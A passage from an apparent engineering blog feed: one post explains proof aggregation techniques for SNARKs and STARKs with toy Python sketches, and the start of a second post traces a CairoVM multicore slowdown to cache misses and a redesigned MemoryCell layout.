&lt;p&gt;SNARKs (succinct, non-interactive arguments of knowledge) and STARKs (scalable, transparent arguments of knowledge) have gained widespread attention due to their applications in decentralized private computation and scaling blockchains. They are tools that allow us to prove to another party that we did a computation correctly, in such a way that verification is much faster than re-executing the computation. The size of the proof is much smaller than all the information needed to check the computation directly. For example, we can prove that we know the solution to a Sudoku game without fully providing it. In the case of the execution of a virtual machine, to prove correctness directly we would have to see how the machine’s registers change at every cycle; the verifier does not need to know the full trace but rather queries the registers at some points. For a discussion on the impact of SNARKs&#x2F;STARKs, see our &lt;a href=&quot;&#x2F;transforming-the-future-with-zero-knowledge-proofs-fully-homomorphic-encryption-and-new-distributed-systems-algorithms&#x2F;&quot;&gt;post&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Proving large programs or computations can be expensive since this introduces an overhead in running them. In some cases, the computation can be broken down into several smaller computations (for example, proving the transactions inside a block can be done by proving each transaction separately), but this has two drawbacks: proof size and verification time scale linearly with the number of components. Both hurt scalability because we need more time to verify the entire computation, and it increases memory use. We can solve this by bundling all the proofs and doing just one verification. We can use several techniques; the best one will depend on the type of proof system we use and our particular needs. This post will discuss some of the alternatives we have and their tradeoffs in terms of prover time, verification time, and proof size.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;aggregation-techniques&quot;&gt;Aggregation techniques&lt;&#x2F;h2&gt;
&lt;p&gt;These techniques will allow us to prove several statements together, reducing the blowup in proof size and verification time introduced by checking several statements. For an explanation of some techniques, see the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=0LW-qeVe6QI&quot;&gt;following video&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;proof-recursion&quot;&gt;Proof recursion&lt;&#x2F;h2&gt;
&lt;p&gt;SNARKs&#x2F;STARKs let us check the validity of any NP statement in a time- and memory-efficient way. The amount of information needed to prove a statement is much smaller than the size of the required witness to check the statement. For example, in STARKs, the verifier does not need to see the whole execution trace of the program; it just needs some random queries. In Plonk, the verifier has the evaluations of the trace polynomials at a random point, which is much less than the $3n$ values in the trace.&lt;&#x2F;p&gt;
&lt;p&gt;How does recursion work? The prover proves that he verified a proof $\pi$ corresponding to some computation with public input $u$. The image below shows the flow for recursion.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;SkeEGSDap.png&quot; alt=&quot;rec&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The prover takes the public input, the witness, and the program and generates the proof $\pi$ attesting to the validity of the computation. The prover then takes the proof $\pi$ and original circuit as witnesses, the public input, and the verification circuit (the operations the verifier would have to do to check the statement) and obtains a new proof $\pi^\prime$, showing that the prover knows the proof $\pi$ which fulfills the verification circuit with the given input. The verifier can check the proof $\pi^\prime$, which shows that the verification done by the prover is valid, which in turn implies the correctness of the first computation. In the case of STARKs, if the trace for the verification operation is shorter than the trace for the original program, proof size and verification time are reduced (since they depend on the trace length, $n$).&lt;&#x2F;p&gt;
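As a purely structural sketch of this flow, the prove and verify functions below are stand-ins (a keyed SHA-256 tag plays the role of a proof; there is no real soundness here); the only point is how the old proof moves into the witness of the next proof:

```python
# Toy sketch of one recursion step. H is a keyed SHA-256 tag standing in for
# a real proof system; SECRET, the program names, and all values are made up.
import hashlib

def H(*parts):
    h = hashlib.sha256()
    for p in parts:
        h.update(str(p).encode())
    return h.hexdigest()

SECRET = "toy-proving-key"  # stands in for cryptographic soundness

def prove(program, public_input, witness):
    # A real prover consumes the witness; this toy tag only binds
    # (program, public_input) so that verify can recompute it.
    return H(SECRET, program, public_input)

def verify(program, public_input, proof):
    return proof == H(SECRET, program, public_input)

# Step 1: prove the original computation (statement: 3 squared equals 9).
pi = prove("square", public_input=9, witness=3)

# Step 2: prove that we ran the verifier on pi. The old proof becomes part
# of the witness; the statement is now "the verifier circuit accepted (9, pi)".
pi_prime = prove("verifier_circuit", public_input=9, witness=("square", pi))
```

The point is only the data flow: $\pi$ moves from being the verifier's input to being part of the witness behind $\pi^\prime$.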
&lt;p&gt;We can also use two different provers. For example, we can prove the first program with STARKs, which is fast but has larger proofs, and then use Groth 16&#x2F;Plonk, which has smaller proof sizes. The advantage is that the second case does not need to handle arbitrary computations, so we can have just one optimized circuit for STARK verification. The result is one small proof with fast verification.&lt;&#x2F;p&gt;
&lt;p&gt;We can also use the same structure and prove the verification of several proofs.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;H1sLvrwp6.png&quot; alt=&quot;0proofs&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;One problem we face is that even though the proof size is reduced, the public input increases linearly. We can solve this by providing a hash&#x2F;commitment to all the public input and passing it as part of the witness. During the verification, we have to check that the hash of the public input in the witness corresponds to the hash&#x2F;commitment of the public input. Proof recursion can be handled more efficiently by building a tree structure, increasing the degree of parallelization.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;Bye7stwpa.png&quot; alt=&quot;0trees&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
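The hash-of-public-inputs trick can be sketched as follows; the names commit and circuit_check are illustrative, and SHA-256 stands in for the hash (inside a real circuit an algebraic hash would be far cheaper to prove):

```python
# Minimal sketch: replace a long list of public inputs with one commitment.
import hashlib

def commit(public_inputs):
    h = hashlib.sha256()
    for x in public_inputs:
        h.update(x.to_bytes(32, "big"))
    return h.hexdigest()

# The verifier sees only the commitment; the full input list travels in the
# witness, and the verification circuit re-hashes it and checks equality.
inputs = [17, 42, 99, 1234]
public_commitment = commit(inputs)

def circuit_check(witness_inputs, claimed_commitment):
    return commit(witness_inputs) == claimed_commitment
```

This keeps the verifier's public-input cost constant no matter how many proofs are aggregated.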
&lt;p&gt;Proof recursion is used in several projects to reduce proof size and make verification cheaper, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;starkware&#x2F;recursive-starks-78f8dd401025&quot;&gt;Starknet&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;polygon.technology&#x2F;blog&#x2F;the-go-fast-machine-adding-recursion-to-polygon-zkevm&quot;&gt;Polygon ZKEVM&lt;&#x2F;a&gt;, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;blog.matter-labs.io&#x2F;zksync-v1-1-reddit-edition-recursion-up-to-3-000-tps-subscriptions-and-more-fea668b5b0ff&quot;&gt;zkSync&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Even though proof recursion has many advantages, it adds workload to the prover. In proof systems such as STARKs, the prover has to compute lots of hashes, which are expensive operations. Luckily, there have been advances in algebraic hash functions (less costly to prove) and protocols such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2024&#x2F;390&quot;&gt;STIR&lt;&#x2F;a&gt; that reduce the number of hashes needed to generate proofs (post coming soon). In SNARKs working over elliptic curves, the proofs consist of elements of the curve (with coordinates over a field $F_p$) and scalars represented in $F_r$ (the scalar field). This creates a problem: checking the proof requires $F_p$ arithmetic to compute the curve operations, but the verifier circuit natively works over the scalar field $F_r$, leading to non-native field operations. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;yi-sun&#x2F;circom-pairing&#x2F;blob&#x2F;master&#x2F;circuits&#x2F;bn254&#x2F;groth16.circom&quot;&gt;Here&lt;&#x2F;a&gt; you can find a circuit to verify Groth 16 proofs, taking around 20 million constraints. As discussed in the following section, curve cycles are a nicer alternative to avoid field emulation.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;cycles-of-curves&quot;&gt;Cycles of curves&lt;&#x2F;h3&gt;
&lt;p&gt;We have the problem that coordinates for the curve $E$ live in $F_p$, but the scalar field is $F_r$. If we can find a curve $E^\prime$ defined over $F_r$ and scalar field $F_p$, then we could check proofs over $E$ using $E^\prime$. Pairs of curves with these characteristics are called a cycle of curves. Fortunately, some curves of the form $y^2 = x^3 + b$ satisfy the conditions. Pallas and Vesta curves (known together as Pasta curves) form a cycle and are used in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.minaprotocol.com&#x2F;zkapps&#x2F;o1js&#x2F;recursion&quot;&gt;Mina’s Pickles&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;zcash&#x2F;halo2&#x2F;tree&#x2F;main&quot;&gt;Halo 2&lt;&#x2F;a&gt;. We covered some of the basics of Pickles in our &lt;a href=&quot;&#x2F;mina-to-ethereum-bridge&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt;. Pickles uses two accumulators (each using a different curve) and defers some checks to the next step. This way, it can avoid expensive verifications and efficiently deliver incrementally verifiable computation.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;S1JbEKDpp.png&quot; alt=&quot;0cycles&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;folding-and-accumulation-schemes&quot;&gt;Folding and accumulation schemes&lt;&#x2F;h2&gt;
&lt;p&gt;One of the drawbacks of full recursion is that we need to prove the whole verification, which can be very expensive. For example, in recursive STARKs, we must compute all the hashes and verify all algebraic operations to get to a new proof. Folding schemes provide an alternative to full verification by combining several instances and accumulating them. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;370.pdf&quot;&gt;Nova&lt;&#x2F;a&gt; introduced a folding scheme for R1CS. The key idea is that if we have two solutions $(u_1 , w_1 )$ and $(u_2 , w_2 )$ for R1CS, we can combine them into a single claim $(u , w)$ for a committed relaxed-R1CS (a generalization of R1CS).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;SJhStYv66.png&quot; alt=&quot;0folding&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We can then generate a proof for the unified claim, which amounts to the validity of all instances.&lt;&#x2F;p&gt;
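The folding step can be sketched over a toy field; the relation below is the relaxed R1CS equation, but the instance, the modulus, and the helper names are illustrative (real Nova also carries commitments to $w$ and $E$ and handles the public-input slots of $z$):

```python
# Toy sketch of Nova-style folding for relaxed R1CS over a small prime field.
P = 97  # toy field modulus

def mat_vec(M, z):
    return [sum(m * x for m, x in zip(row, z)) % P for row in M]

def hadamard(a, b):
    return [(x * y) % P for x, y in zip(a, b)]

def vec_add(a, b, s=1):
    return [(x + s * y) % P for x, y in zip(a, b)]

def is_satisfied(A, B, C, z, u, E):
    # Relaxed R1CS: (Az) o (Bz) == u * (Cz) + E, with o the entrywise product.
    return hadamard(mat_vec(A, z), mat_vec(B, z)) == vec_add(E, mat_vec(C, z), u)

def fold(A, B, C, inst1, inst2, r):
    (z1, u1, E1), (z2, u2, E2) = inst1, inst2
    Az1, Bz1, Cz1 = mat_vec(A, z1), mat_vec(B, z1), mat_vec(C, z1)
    Az2, Bz2, Cz2 = mat_vec(A, z2), mat_vec(B, z2), mat_vec(C, z2)
    # Cross term T absorbs the mixed products created by z = z1 + r*z2.
    T = [(a1 * b2 + a2 * b1 - u1 * c2 - u2 * c1) % P
         for a1, b1, c1, a2, b2, c2 in zip(Az1, Bz1, Cz1, Az2, Bz2, Cz2)]
    z = vec_add(z1, z2, r)
    u = (u1 + r * u2) % P
    E = [(e1 + r * t + r * r * e2) % P for e1, t, e2 in zip(E1, T, E2)]
    return z, u, E

# One constraint, z0 * z0 == z1, and two satisfying (non-relaxed) instances.
A, B, C = [[1, 0]], [[1, 0]], [[0, 1]]
inst1 = ([3, 9], 1, [0])
inst2 = ([4, 16], 1, [0])
z, u, E = fold(A, B, C, inst1, inst2, r=5)
```

The folded triple $(z, u, E)$ satisfies the relaxed relation whenever both inputs do, which is exactly why one proof of the folded claim attests to both original instances.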
&lt;h2 id=&quot;snarkpack&quot;&gt;SNARKPack&lt;&#x2F;h2&gt;
&lt;p&gt;Some proof systems have proofs that can be aggregated by other methods, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;529.pdf&quot;&gt;SNARKPack&lt;&#x2F;a&gt; for Groth 16. The proof for &lt;a href=&quot;&#x2F;groth16&#x2F;&quot;&gt;Groth 16&lt;&#x2F;a&gt; consists of three elements $\Pi = (\pi_1 , \pi_2 , \pi_3)$, where $\pi_1, \pi_3$ belong to the group $G_1$ of an elliptic curve and $\pi_2$ belongs to $G_2$. The check in Groth 16 is the following pairing equation,&lt;br &#x2F;&gt;
$e(\pi_{1} , \pi_{2} ) = Y e(\pi_3 , D)$&lt;br &#x2F;&gt;
where $Y$ depends on the public input and the parameters of the ceremony, and $D$ is part of the parameters. If we have several proofs $\Pi_k = (\pi_{1k} ,\pi_{2k}, \pi_{3k} )$, we can combine the different checks,&lt;br &#x2F;&gt;
$e(\pi_{1k} , \pi_{2k} ) = Y_k e(\pi_{3k} , D)$&lt;br &#x2F;&gt;
using random numbers $r_k$ such that&lt;br &#x2F;&gt;
$\prod e(\pi_{1k} , \pi_{2k} )^{ r_k } = \prod Y_k^{ r_k } \prod e(\pi_{3k} , D)^{ r_k }$&lt;&#x2F;p&gt;
&lt;p&gt;We can rewrite this as&lt;br &#x2F;&gt;
$Z_{AB} = Y^\prime e(Z_C , D)$&lt;br &#x2F;&gt;
where&lt;br &#x2F;&gt;
$Z_{AB} = \prod e(\pi_{1k} , \pi_{2k} )^{ r_k }$&lt;br &#x2F;&gt;
$Y^\prime = \prod Y_k^{ r_k }$&lt;br &#x2F;&gt;
$Z_C = \prod \pi_{3k}^{ r_k }$&lt;br &#x2F;&gt;
The verifier needs to check that $Z_{AB}$ and $Z_C$ are consistent with the proof triples $\Pi_k$ provided. This is done via a target inner pairing product and a multiexponentiation inner product. The advantage is that the combined proof size is practically independent of the number of proofs aggregated.&lt;&#x2F;p&gt;
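The batching identity can be checked numerically with a fake pairing; here $e(a, b) = g^{ab} \bmod q$ stands in for a real bilinear map, and the proof triples are made-up exponents chosen so that each individual check holds by construction:

```python
# Toy sketch of the SNARKPack batching identity with a stand-in "pairing".
import random

q = 2 ** 61 - 1   # Mersenne prime, toy target-group modulus
g = 5             # toy generator
D = 7             # stand-in for the verification-key element D

def e(a, b):
    # "Bilinear" in the exponent: e(a, b)^r equals e(r * a, b).
    return pow(g, (a * b) % (q - 1), q)

proofs = []
for pi1, pi2, pi3 in [(3, 11, 2), (6, 4, 9), (8, 13, 5)]:
    # Choose Y so the per-proof check e(pi1, pi2) == Y * e(pi3, D) holds.
    Y = pow(g, (pi1 * pi2 - pi3 * D) % (q - 1), q)
    assert e(pi1, pi2) == (Y * e(pi3, D)) % q
    proofs.append((pi1, pi2, pi3, Y))

# Batch with random coefficients r_k: one product equation replaces k checks.
rs = [random.randrange(1, 10 ** 6) for _ in proofs]
Z_AB, Y_prime, Z_C = 1, 1, 0
for (pi1, pi2, pi3, Y), r in zip(proofs, rs):
    Z_AB = (Z_AB * pow(e(pi1, pi2), r, q)) % q
    Y_prime = (Y_prime * pow(Y, r, q)) % q
    Z_C = Z_C + r * pi3   # the multiexponentiation, in exponent form here
```

In the real scheme $Z_C$ is a group element computed by multiexponentiation, and the prover additionally convinces the verifier that $Z_{AB}$ and $Z_C$ were formed from the claimed triples.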
&lt;h2 id=&quot;continuations&quot;&gt;Continuations&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.risczero.com&#x2F;blog&#x2F;continuations&quot;&gt;Continuations&lt;&#x2F;a&gt; are a mechanism by which we can split a complex computation into smaller segments that can be computed and proven separately. This enables faster proving by leveraging parallelization and reducing the provers’ memory footprint. The downside is a blowup in proof size unless implemented in rollup form. However, since the segment proofs are independent, we can use a folding scheme to combine all the claims against the same verification circuit, or use recursive proving to wrap all the segments into a single proof (which could also be a SNARK with constant proof size).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Over the last decade, we have seen the development of new proof systems and techniques to show the validity of computations in a memory- and time-efficient way. However, large computations often need to be broken down into smaller, independent computations (for example, proving a block of transactions by proving each transaction separately). The downside is that we have a blowup in proof size and verification time, which can hurt scalability or increase costs. Luckily, there are several techniques for aggregating proofs, so that verifying a single proof implies the validity of all the others. While proof recursion offers a highly parallelizable way to aggregate proofs, it involves costly operations, such as field emulation and hash functions. Accumulation or folding schemes provide an alternative to full verification by deferring some checks until a final verification step.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Beyond Single-Core: Enhancing VM Efficiency in Parallel Environments</title>
          <pubDate>Fri, 22 Mar 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/beyond-single-core-enhancing-vm-efficiency-in-parallel-environments/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/beyond-single-core-enhancing-vm-efficiency-in-parallel-environments/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/beyond-single-core-enhancing-vm-efficiency-in-parallel-environments/">&lt;p&gt;At LambdaClass, benchmarks and performance analysis are critical aspects of our development process. We always perform performance analysis in every PR via our CI pipelines to spot any performance issues.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;cairo-vm&quot;&gt;Cairo virtual machine&lt;&#x2F;a&gt; is not an exception since it is a core part of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.starknet.io&#x2F;en&quot;&gt;Starknet&lt;&#x2F;a&gt; network. In this post, we will delve into how we investigated a performance regression and then optimized a core data structure in the library to improve its multicore performance.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;Ske40pOAa.png&quot; alt=&quot;Screenshot 2024-03-15 at 17.58.47&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;a-first-look&quot;&gt;A first look&lt;&#x2F;h2&gt;
&lt;p&gt;Some background: Not long ago, we introduced an optional feature, &lt;code&gt;lambdaworks-felt,&lt;&#x2F;code&gt; which marked a significant improvement in our performance metrics. It uses the Felt (field element) implementation from our cryptography library, &lt;a href=&quot;&#x2F;lambdaworks-design-and-usage-part-1-finite-fields&#x2F;&quot;&gt;LambdaWorks&lt;&#x2F;a&gt;, which replaced a more naive implementation using &lt;code&gt;BigInt&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Last week, the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;eqlabs&#x2F;pathfinder&quot;&gt;Pathfinder&lt;&#x2F;a&gt; team from Equilibrium (as always, we want to thank them for finding and raising this issue) observed an unexpected scaling behavior when they tried to re-execute some Sepolia testnet blocks using their &lt;code&gt;re_execute&lt;&#x2F;code&gt; tool that spins up several CairoVMs to run the block’s transactions in parallel.&lt;&#x2F;p&gt;
&lt;p&gt;When several instances of the CairoVM with the &lt;code&gt;lambdaworks-felt&lt;&#x2F;code&gt; feature enabled are executed on a hyperthreading-enabled processor, execution time does not scale with the number of enabled threads as well as it does without the feature.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;ByrB06O0T.png&quot; alt=&quot;Untitled (2)&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The figure, contributed by the Pathfinder team, shows the results of a benchmark performed on a Ryzen 5900X. As you can see, the CairoVM with the lambdaworks-felt feature performs better when executed with fewer threads, but the run with the default implementation (a Felt type built on the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.rs&#x2F;num-bigint&#x2F;latest&#x2F;num_bigint&#x2F;&quot;&gt;num_bigint&lt;&#x2F;a&gt; crate) scales better as the number of threads increases.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;digging-deeper&quot;&gt;Digging deeper&lt;&#x2F;h2&gt;
&lt;p&gt;Our first task was to reproduce what had been reported. Once we had reproduced the Pathfinder team’s results, we started investigating possible causes and found that we had many cache misses when using the lambdaworks-based felt.&lt;&#x2F;p&gt;
&lt;p&gt;VM with Bigint felt:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ perf stat -e cache-misses .&#x2F;binaries&#x2F;re_execute_main sepolia-testnet_0.11.0_47191.sqlite 47000 47191&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; Performance counter stats for &amp;#39;.&#x2F;binaries&#x2F;re_execute_main sepolia-testnet_0.11.0_47191.sqlite 47000 47191&amp;#39;:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        2094269051      cache-misses&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       5.926431912 seconds time elapsed&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     168.877378000 seconds user&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       3.675086000 seconds sys&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;VM with Lambdaworks felt:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ perf stat -e cache-misses .&#x2F;binaries&#x2F;re_execute_main_lambdaworks sepolia-testnet_0.11.0_47191.sqlite 47000 47191&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; Performance counter stats for &amp;#39;.&#x2F;binaries&#x2F;re_execute_main_lambdaworks sepolia-testnet_0.11.0_47191.sqlite 47000 47191&amp;#39;:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        2426557083      cache-misses&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       6.931543878 seconds time elapsed&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     197.086250000 seconds user&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       6.588698000 seconds sys&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;So, here we can see that the lambdaworks felt has 16% more cache misses than the BigInt implementation.&lt;&#x2F;p&gt;
&lt;p&gt;How does this inform our search for a cause? We talked to the team member who originally benchmarked the CairoVM’s memory-allocation behavior and integrated lambdaworks-felt into it. When we showed him these results, he suggested looking at the felt layout in memory while the VM is running.&lt;&#x2F;p&gt;
&lt;p&gt;When the CairoVM runs a program, it stores the felt values in its memory representation, which encodes the rules and guarantees necessary for proving. So for a running program, memory is a collection of &lt;code&gt;MemoryCell&lt;&#x2F;code&gt;s, which in turn wraps a boolean that signals if the memory cell was accessed during the program execution and a &lt;code&gt;MaybeRelocatable&lt;&#x2F;code&gt; value, an enum that can be either a felt or a Relocatable value:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub(crate) struct MemoryCell(MaybeRelocatable, bool);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub enum MaybeRelocatable {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    RelocatableValue(Relocatable),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Int(Felt252),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;When looking at cache issues, one usually looks at the shape or layout that values take when in memory. We noticed that when using the &lt;code&gt;lambdaworks-felt&lt;&#x2F;code&gt; feature, the &lt;code&gt;MemoryCell&lt;&#x2F;code&gt; structure size increased from 40 to 48 bytes, which was the root cause of the increase in cache misses when running parallel workloads.&lt;&#x2F;p&gt;
&lt;p&gt;We can guess that since multiple VMs are trying to populate the cache with their values, felts spilling across cache-line boundaries would cause more cache thrashing.&lt;&#x2F;p&gt;
&lt;p&gt;Another factor to take into account is the use of SMT (Simultaneous Multithreading, also known as Hyper-Threading) in AMD and Intel CPUs. This technique runs two logical cores inside a single physical core, which usually improves overall performance.&lt;&#x2F;p&gt;
&lt;p&gt;But that’s not always the case; sometimes, it gets in the way. For example, one logical core can evict cached items that later the other logical core will need, leading to more cache misses.&lt;&#x2F;p&gt;
&lt;p&gt;Just guessing is magical thinking, which is for astrologists, so we decided to implement a change and measure the impact.&lt;&#x2F;p&gt;
&lt;p&gt;To address this, we refactored that structure to a more cache-friendly representation. The new optimized &lt;code&gt;MemoryCell&lt;&#x2F;code&gt; can now fit in half a 64-byte cache line instead of almost a full cache line. The new structure now stores the data and metadata in a raw form using the spare bits in the felt representation, and the &lt;code&gt;MaybeRelocatable&lt;&#x2F;code&gt; instances are built as needed from it.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; [`MemoryCell`] represents an optimized storage layout for the VM memory.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; It&amp;#39;s specified to have both size an alignment of 32 bytes to optimize cache access.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; Typical cache sizes are 64 bytes; a few cases might be 128 bytes, meaning 32 bytes aligned to&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; 32 bytes boundaries will never get split into two separate lines, avoiding double stalls and&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; reducing false sharing and evictions.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; The trade-off is extra computation for conversion to our &amp;quot;in-flight&amp;quot; `MaybeRelocatable` and&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; `Felt252` as well as some extra copies. Empirically, this seems to be offset by the improved&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; locality of the bigger structure for Lambdaworks. There is a big hit from the conversions when&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
